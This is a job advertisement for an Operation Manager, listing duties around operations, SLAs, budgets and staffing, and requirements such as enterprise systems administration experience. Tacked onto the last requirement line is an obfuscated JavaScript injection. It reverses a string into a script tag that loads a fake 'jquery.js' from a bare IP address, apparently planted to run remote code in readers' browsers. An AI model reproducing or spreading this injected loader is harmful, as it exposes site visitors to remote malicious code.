The role of the Operation Manager is to ensure that the strategic and business objectives as well as the values are put into practice. In conjunction with other members of staff they will ensure business growth through directing and managing business operations activities to ensure they are delivered in accordance with the strategic objectives.
The Operation Manager will be responsible for overseeing support services team for all customers.
The Operation Manager will plan, direct and manage the performance of all internal operations, so as to maintain and develop business growth in accordance with the overall strategy.
• Improve the operational systems, processes and policies in support of the company’s mission – specifically, support better management reporting, information flow and management, business process and organisational planning.
• Play a significant role in long-term planning, with the view to delivering operational excellence.
• Maintain the administration, budgeting, monitoring, reporting, communication and liaison at a level acceptable to the HOD.
• Implement, maintain and manage an effective system of controls throughout OSD covering non-financial as well as financial controls.
• Ensure that operating objectives and standards of performance are owned by staff and interns.
• Ensure that appropriate standards of conduct are established and complied with.
• Implement effective succession planning, people management, development, recruitment, and retention strategies.
• Present a yearly budget in conjunction with the HOD approval and prudently manage resources within those budget guidelines.
• Ensure all SLA’s are achieved on monthly basis for all customers
• To ensure total customer satisfaction for all support and services matters.
• Bachelor’s degree or equivalent in Computer Science, Information Management Systems, or similar field of study
• Minimum 7 years’ experience in Systems administration for an enterprise
• Leader/supervisor/manager of an operations team with direct reports (4 years minimum)
• Excellent oral and written communication skills
• Strong interpersonal and team building skills
• Demonstrated critical thinking and problem solving capabilities
• Ability to multi-task and handle numerous, simultaneous priorities
• Accessible 7/24 for outage escalations and recovery activities.
• Willingness to occasionally work flexible hours to affect system upgrades and troubleshoot system issues
• Communicate (read, write, and speak) and direct the work of others by oral and written instructions in English & Bahasa Malaysia document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))